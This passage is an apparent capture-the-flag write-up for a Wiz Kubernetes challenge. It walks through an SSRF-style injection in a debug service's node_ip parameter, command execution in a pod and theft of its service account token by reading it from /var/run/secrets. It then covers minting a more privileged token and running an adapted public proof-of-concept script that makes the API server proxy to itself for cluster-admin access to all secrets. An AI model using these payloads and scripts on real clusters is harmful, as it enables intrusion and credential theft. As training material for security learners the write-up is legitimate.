This is basically trusting user input in terms of the parameters from the request. The validation is only being done on the final thing. So theoretically, I could put in an entire URL to the node_ip parameter, and “comment out” the rest. The URL I provide would still need to pass validation. The validations are:
- Parseable as a URL
- Needs to point to an IP not hostname
- The IP needs to be in the same /16 CIDR range as the nodes
- Not contain
k8s-debug-bridge - Needs to have at least 3 path parts
- The second path part (typically the namespace, needs to be
app)
I wonder if I can get it to list pods. The endpoint for that is just /pods. If I add a # after that, I can have the rest of the path parts to meet the validation, but the Kubelet would ignore it all.
root@test:~/k8s-debug-bridge/blobs/sha256/root# curl http://k8s-debug-bridge.app/logs -d '{"node_ip": "172.30.0.2:10250/pods##", "pod": "app-blog", "namespace": "app",
"container": "app-blog"}'
invalid URL path format
Wait … what… thats for the path parts… oh re-reading the source code, it does check that from the parsed URL. OK, so we need to always match that part. OK, let’s see if we can get code execution into that pod then instead. The path for that is /run/NS/pod/container, and it needs a cmd parameter. I usually send that via POST, I wonder if we could inject that as a URL parameter though.
root@test:~/k8s-debug-bridge/blobs/sha256/root# curl http://k8s-debug-bridge.app/logs -d '{"node_ip": "172.30.0.2:10250/run/app/app-blog/app-blog?cmd=id#", "pod": "app-
blog", "namespace": "app", "container": "app-blog"}'
Failed to fetch GET: kubelet returned status 405: 405: Method Not Allowed
Ah yes, the /logs endpoint sends a GET request to Kubelet. This needs to be a POST. The /checkpoint should help us around that.
root@test:~/k8s-debug-bridge/blobs/sha256/root# curl http://k8s-debug-bridge.app/checkpoint -d '{"node_ip": "172.30.0.2:10250/run/app/app-blog/app-blog?cmd=id#", "pod":
"app-blog", "namespace": "app", "container": "app-blog"}'
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
Success. OK, let’s steal its service account token and go from there.
root@test:~/k8s-debug-bridge/blobs/sha256/root# curl http://k8s-debug-bridge.app/checkpoint -d '{"node_ip": "172.30.0.2:10250/run/app/app-blog/app-blog?cmd=cat+/var/run/secrets/kubernetes.io/serviceaccount/token#", "pod": "app-blog", "namespace": "app", "container": "app-blog"}'; echo
eyJhbGciOiJSUzI1NiIsImtpZCI6IjVjWHc0NnVkX0RVeHpLb05zenduT2t6WTUxOTJhTmVSSnpuWFQ5VGp5TEEifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiLCJrM3MiXSwiZXhwIjoxNzk1ODcxMTc2LCJpYXQiOjE3NjQzMzUxNzYsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwianRpIjoiZmI4NGU1NGQtYjY0NC00ZjI0LWE2MTAtZWY5NTBkZDk0M2UzIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJhcHAiLCJub2RlIjp7Im5hbWUiOiJub2RlciIsInVpZCI6IjgwMWY3YjVkLTIzMzItNDQzYS05ZDQ0LWExOTBkMWM5MzM0ZCJ9LCJwb2QiOnsibmFtZSI6ImFwcC1ibG9nIiwidWlkIjoiYjJhMGM5NDctOWQzYi00ZTk1LTk4ZmYtZmNkMjU0NDExNjhmIn0sInNlcnZpY2VhY2NvdW50Ijp7Im5hbWUiOiJhcHAiLCJ1aWQiOiI2Y2JiNTU4Ny05OWM5LTQ0YWQtYTgzYi1lMWVlOTYwZTI5NjQifSwid2FybmFmdGVyIjoxNzY0MzM4NzgzfSwibmJmIjoxNzY0MzM1MTc2LCJzdWIiOiJzeXN0ZW06c2VydmljZWFjY291bnQ6YXBwOmFwcCJ9.qpZ7PU7y9DJdJm44dHav8UvrFV1IUScnur2MMapvM6LwRJmAMb7NfIMizcwDZ9fv_0V0jZMhRSjXZsNWCxxb5WwfiePCBuwhuyjCvZncGuhzi_0cwU9NrevUNm30gapkEnD2VGyo1lVjn1J5wSTx9zegKc_WDMT09R9pF7x7SehQMqIGkIoOYg59KvMS5QG5F2XqK8pJthHyCKnCLRX00Ct2ZGCnE16iaWRz4JZx9xX4ILSDmZC1Ur8GmegbZmQdcMFK0dia2ecrZ6JsntSnAK1yHzg6Hc7qt3BwOgGIHBcxS-o2qJS6aEwxSJRIwni1jzVEw5HLfFJyGgtDSBr6Hg
I have the + in the command as it’s part of a URL parameter, so the space needs to be URL encoded which results in a +.
Let’s see what this token can do.
root@test:~/k8s-debug-bridge/blobs/sha256/root# k -n app auth can-i --list
Error from server (Forbidden): selfsubjectrulesreviews.authorization.k8s.io is forbidden: User "system:serviceaccount:app:app" cannot create resource "selfsubjectrulesreviews" in API group "authorization.k8s.io" at the cluster scope
Siiiggghhhhhhhhhh!
OK, let’s just brute force the common ones..
root@test:~/k8s-debug-bridge/blobs/sha256/root# k -n app get pods
Error from server (Forbidden): pods is forbidden: User "system:serviceaccount:app:app" cannot list resource "pods" in API group "" in the namespace "app"
root@test:~/k8s-debug-bridge/blobs/sha256/root# k -n app get svc
Error from server (Forbidden): services is forbidden: User "system:serviceaccount:app:app" cannot list resource "services" in API group "" in the namespace "app"
root@test:~/k8s-debug-bridge/blobs/sha256/root# k -n app get cm
Error from server (Forbidden): configmaps is forbidden: User "system:serviceaccount:app:app" cannot list resource "configmaps" in API group "" in the namespace "app"
root@test:~/k8s-debug-bridge/blobs/sha256/root# k -n app get secrets
NAME TYPE DATA AGE
user-johndoe Opaque 3 32d
user-skybound Opaque 3 13m
OK. It has some level of permissions on secrets. Based on the presence of the user-skybound secret, clearly it can create secrets too…
The fact that the k8s-debug-bridge is in the same namespace leads me to a thought. Could we create a secret of type kubernetes.io/service-account-token (these get auto-populated by Kubernetes with the appropriate service account token), and configure that for the service account used by k8s-debug-bridge. We would need to know the secret name, but we might be able to figure that out. We can probably trick it into sending a request that it is not authorised to perform, that should give us the service account name in the error response. Let’s find the IP of the API server on the nodes CIDR range.
root@test:~/k8s-debug-bridge/blobs/sha256/root# nmap -p- 172.30.0.1-3 -T5
Starting Nmap 7.93 ( https://nmap.org ) at 2025-11-28 13:16 UTC
Nmap scan report for 172.30.0.1
Host is up (0.0000090s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
53/tcp open domain
37149/tcp open unknown
Nmap scan report for noder (172.30.0.2)
Host is up (0.0000060s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
6443/tcp open sun-sr-https
10250/tcp open unknown
Nmap done: 3 IP addresses (2 hosts up) scanned in 3.30 seconds
I’ll assume it’s the 6443. However, checking the 37149 (within NodePort range) also reveals that is an API server.
root@test:~/k8s-debug-bridge/blobs/sha256/root# curl http://k8s-debug-bridge.app/checkpoint -d '{"node_ip": "172.30.0.2:6443/run/app/app-blog/app-blog?cmd=cat+/var/run/
secrets/kubernetes.io/serviceaccount/token#", "pod": "app-blog", "namespace": "app", "container": "app-blog"}'; echo
Failed to fetch POST: kubelet returned status 403: {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"forbidden: User \"system:serviceaccount:app:k8s-debug-bridge\" cannot post path \"/run/app/app-blog/app-blog\"","reason":"Forbidden","details":{},"code":403}
That worked. Shoulda guessed the service account was just k8s-debug-bridge though… nevermind….
We can now create the secret…
apiVersion: v1
kind: Secret
metadata:
name: debug-bridge-token
namespace: app
annotations:
kubernetes.io/service-account.name: "k8s-debug-bridge"
type: kubernetes.io/service-account-token
root@test:~/k8s-debug-bridge/blobs/sha256/root# k apply -f secret.yml
secret/debug-bridge-token created
root@test:~/k8s-debug-bridge/blobs/sha256/root# k -n app get secret debug-bridge-token -o yaml
apiVersion: v1
data:
ca.crt: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUJkekNDQVIyZ0F3SUJBZ0lCQURBS0JnZ3Foa2pPUFFRREFqQWpNU0V3SHdZRFZRUUREQmhyTTNNdGMyVnkKZG1WeUxXTmhRREUzTmpFMU1EZzNNalV3SGhjTk1qVXhNREkyTVRrMU9EUTFXaGNOTXpVeE1ESTBNVGsxT0RRMQpXakFqTVNFd0h3WURWUVFEREJock0zTXRjMlZ5ZG1WeUxXTmhRREUzTmpFMU1EZzNNalV3V1RBVEJnY3Foa2pPClBRSUJCZ2dxaGtqT1BRTUJCd05DQUFTVXFNQk9NbFBxZ2wzOFpRcHpZQWtScUgrWEhMRXhWN0dyNDVHNCthQTQKaU1pUzRHakd0RlJFcWhtNXlnb2ZTd3dweE54d0RKdXhIcjBOQzIzMjVZNUxvMEl3UURBT0JnTlZIUThCQWY4RQpCQU1DQXFRd0R3WURWUjBUQVFIL0JBVXdBd0VCL3pBZEJnTlZIUTRFRmdRVXZuT2ZuRURGRDJoZ001ZWlhVm1wCkZnMW9kVE13Q2dZSUtvWkl6ajBFQXdJRFNBQXdSUUlnWlI5bVVzWHlmVXlLeWFMR1QwVTgrRkl1azdId05GNDkKM2RsSFV1NkVGbXNDSVFEMGpZekY3WFluWXRnd1NzQU54VWNWcDM5OXFXMjRIYTNGemcrV2ZIK2tBQT09Ci0tLS0tRU5EIENFUlRJRklDQVRFLS0tLS0K
namespace: YXBw
token: ZXlKaGJHY2lPaUpTVXpJMU5pSXNJbXRwWkNJNklqVmpXSGMwTm5Wa1gwUlZlSHBMYjA1emVuZHVUMnQ2V1RVeE9USmhUbVZTU25wdVdGUTVWR3A1VEVFaWZRLmV5SnBjM01pT2lKcmRXSmxjbTVsZEdWekwzTmxjblpwWTJWaFkyTnZkVzUwSWl3aWEzVmlaWEp1WlhSbGN5NXBieTl6WlhKMmFXTmxZV05qYjNWdWRDOXVZVzFsYzNCaFkyVWlPaUpoY0hBaUxDSnJkV0psY201bGRHVnpMbWx2TDNObGNuWnBZMlZoWTJOdmRXNTBMM05sWTNKbGRDNXVZVzFsSWpvaVpHVmlkV2N0WW5KcFpHZGxMWFJ2YTJWdUlpd2lhM1ZpWlhKdVpYUmxjeTVwYnk5elpYSjJhV05sWVdOamIzVnVkQzl6WlhKMmFXTmxMV0ZqWTI5MWJuUXVibUZ0WlNJNkltczRjeTFrWldKMVp5MWljbWxrWjJVaUxDSnJkV0psY201bGRHVnpMbWx2TDNObGNuWnBZMlZoWTJOdmRXNTBMM05sY25acFkyVXRZV05qYjNWdWRDNTFhV1FpT2lJMk5XVTFNV0k1TXkxa05UVTRMVFF3TWpVdFlXVTFOQzAxWTJGa1pHTTNaV05qWWpnaUxDSnpkV0lpT2lKemVYTjBaVzA2YzJWeWRtbGpaV0ZqWTI5MWJuUTZZWEJ3T21zNGN5MWtaV0oxWnkxaWNtbGtaMlVpZlEuRk5zY0dZa3VONlZnTXRLMWpxWUtwcVljaHNubGUzUG5Zb0NHemdheVJRMFU3TlE0Y2lkLWcyb2MxU0cxYm5FSEpIa1FWMEYteXRPZE55RHJaNllLYlZIZ2JWNG03U3BUWmdyZkNielZnZnV1RzNkLW5VZTlkejRmc2VVa0ZWNFZDSWNSdkdvS3RTSmEtdHNyV0J0UFY4cTI0Nmg2SndqVG9LajVmN3pHZEZZc2ZULXhQQXJzeXROaU9qWlo0NkJQeFo4eTJ4RkR5VFpBRFBILW5WWkFvWFU3YTVTZHNQRU91WUU1el9zN3N6N0Z0WmhPa2FSdy12UTNhUll4WjAtdW02SkRLaUxQN1hZMFM1RFRfLTNsSTJwQldZWE1YM3QxWk5JYUwwSUoxbWZjX1JMQXp6RjBObFhfaHZVVFhaa1ByLVpzTVk4UnQzZmNySGUtWDdaa3BB
kind: Secret
metadata:
annotations:
kubectl.kubernetes.io/last-applied-configuration: |
{"apiVersion":"v1","kind":"Secret","metadata":{"annotations":{"kubernetes.io/service-account.name":"k8s-debug-bridge"},"name":"debug-bridge-token","namespace":"app"},"type":"kubernetes.io/service-account-token"}
kubernetes.io/service-account.name: k8s-debug-bridge
kubernetes.io/service-account.uid: 65e51b93-d558-4025-ae54-5caddc7eccb8
creationTimestamp: "2025-11-28T13:19:25Z"
name: debug-bridge-token
namespace: app
resourceVersion: "1584"
uid: dba790f1-5390-4063-b155-cccfff076f00
type: kubernetes.io/service-account-token
Excellent. Let’s see what this can do now.
root@test:~/k8s-debug-bridge/blobs/sha256/root# alias k2="kubectl --token $TOKEN2"
root@test:~/k8s-debug-bridge/blobs/sha256/root# k2 auth whoami
ATTRIBUTE VALUE
Username system:serviceaccount:app:k8s-debug-bridge
UID 65e51b93-d558-4025-ae54-5caddc7eccb8
Groups [system:serviceaccounts system:serviceaccounts:app system:authenticated]
root@test:~/k8s-debug-bridge/blobs/sha256/root# k2 auth can-i --list -n app
Resources Non-Resource URLs Resource Names Verbs
selfsubjectreviews.authentication.k8s.io [] [] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
nodes/checkpoint [] [] [get create patch]
nodes/proxy [] [] [get create patch]
nodes/status [] [] [get create patch]
nodes [] [] [get list watch]
[/.well-known/openid-configuration/] [] [get]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks/] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
Those permissions are super interesting. Of note, this reminds me of a vulnerability that I saw in one of the yearly Kube audits. I’ve been meaning to add this one to IceKube for a while, but haven’t got around to it. It was this issue. Essentially with GET on nodes/proxy, and either patch on nodes/status or create on nodes, you can trick the API server into authenticating against itself, thereby granting cluster admin. The report had a PoC script as well. Let’s use that and see if we can get it working.
Essentially the way this attack works is you update the Kubelet port details within a nodes status to that of an API server. You then ask the API server to proxy a network request through the node which it does through the Kubelet. As the Kubelet status has been modified to point to the API server, the API server connects and authenticates to itself, allowing your proxy request through.
The PoC script they include in the report was the following:
#!/bin/bash
set -euo pipefail
readonly NODE=rtt-k8s-node # hostname of the worker node
readonly API_SERVER_PORT=6443 # web port of API server
readonly NODE_IP=192.168.136.28 # IP address of worker node
readonly API_SERVER_IP=192.168.136.27 # IP address of API server
readonly BEARER_TOKEN=77777 # bearer token to authenticate to API server - other authentication methods could be used
while true; do
curl -k -H "Authorization: Bearer ${BEARER_TOKEN}" -H 'Content-Type: application/json' \
"https://${API_SERVER_IP}:${API_SERVER_PORT}/api/v1/nodes/${NODE}/status" >"${NODE}-orig.json"
cat $NODE-orig.json |
sed "s/\"Port\": 10250/\"Port\": ${API_SERVER_PORT}/g" | sed "s/\"${NODE_IP}\"/\"${API_SERVER_IP}\"/g" \
>"${NODE}-patched.json"
curl -k -H "Authorization: Bearer ${BEARER_TOKEN}" -H 'Content-Type:application/merge-patch+json' \
-X PATCH -d "@${NODE}-patched.json" \
"https://${API_SERVER_IP}:${API_SERVER_PORT}/api/v1/nodes/${NODE}/status"
done
This script will keep a node patched, so it can be targeted with a proxy command such as:
curl -k -H "Authorization: Bearer $TOKEN" https://kubemaster01.test.lab:6443/api/v1/nodes/https:kubeworker02:10250/proxy/runningpods/
This script works when we can have multiple terminals running, within Wiz’s environment. That isn’t the case. So I’ll make a couple of quick tweaks. First we need some node IPs though.
root@test:~/k8s-debug-bridge/blobs/sha256/root# k2 get node -o wide
NAME STATUS ROLES AGE VERSION INTERNAL-IP EXTERNAL-IP OS-IMAGE KERNEL-VERSION CONTAINER-RUNTIME
noder Ready control-plane,master 32d v1.31.5+k3s1 172.30.0.2 <none> K3s v1.31.5+k3s1 6.1.128 containerd://1.7.23-k3s2
OK, so single node, we have its IP.
We’ll modify the script to not be a while loop, but to be a single patch and submit the proxy request.
#!/bin/bash
set -euo pipefail
readonly NODE=noder # hostname of the worker node
readonly API_SERVER_PORT=6443 # web port of API server
readonly NODE_IP=172.30.0.2 # IP address of worker node
readonly API_SERVER_IP=172.30.0.2 # IP address of API server
readonly BEARER_TOKEN=$TOKEN2 # bearer token to authenticate to API server - other authentication methods could be used
curl -k -H "Authorization: Bearer ${BEARER_TOKEN}" -H 'Content-Type: application/json' "https://${API_SERVER_IP}:${API_SERVER_PORT}/api/v1/nodes/${NODE}/status" > "${NODE}-orig.json"
cat $NODE-orig.json | sed "s/\"Port\": 10250/\"Port\": ${API_SERVER_PORT}/g" > "${NODE}-patched.json"
curl -k -H "Authorization: Bearer ${BEARER_TOKEN}" -H 'Content-Type:application/merge-patch+json' -X PATCH -d "@${NODE}-patched.json" "https://${API_SERVER_IP}:${API_SERVER_PORT}/api/v1/nodes/${NODE}/status"
curl -k -H "Authorization: Bearer $BEARER_TOKEN" https://${API_SERVER_IP}:6443/api/v1/nodes/https:${NODE}:${API_SERVER_PORT}/proxy/api/v1/secrets/
Running that, we get some fun output.
root@test:~/k8s-debug-bridge/blobs/sha256/root# bash script.sh
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 8391 0 8391 0 0 215k 0 --:--:-- --:--:-- --:--:-- 221k
[..SNIP..]
"data": {
"flag": "V0laX0NURntrOHNfaXNfb25lX2JpZ19wcm94eX0=",
"msg": "SWYgeW91IGNvbXBsZXRlZCB0aGlzLCBjaGVjayBvdXQgaHR0cHM6Ly96ZXJvZGF5LmNsb3VkIGZvciBhbm90aGVyIGNoYWxsZW5nZSE="
},
"type": "Opaque"
},
[..SNIP..]
Woo… decoding that gets our flag!
root@test:~/k8s-debug-bridge/blobs/sha256/root# base64 -d <<< V0laX0NURntrOHNfaXNfb25lX2JpZ19wcm94eX0=
WIZ_CTF{k8s_is_one_big_proxy}
That was a fun one. Was not expecting that final step, I think this is the first time I’ve done it not in a test environment just playing with the technique.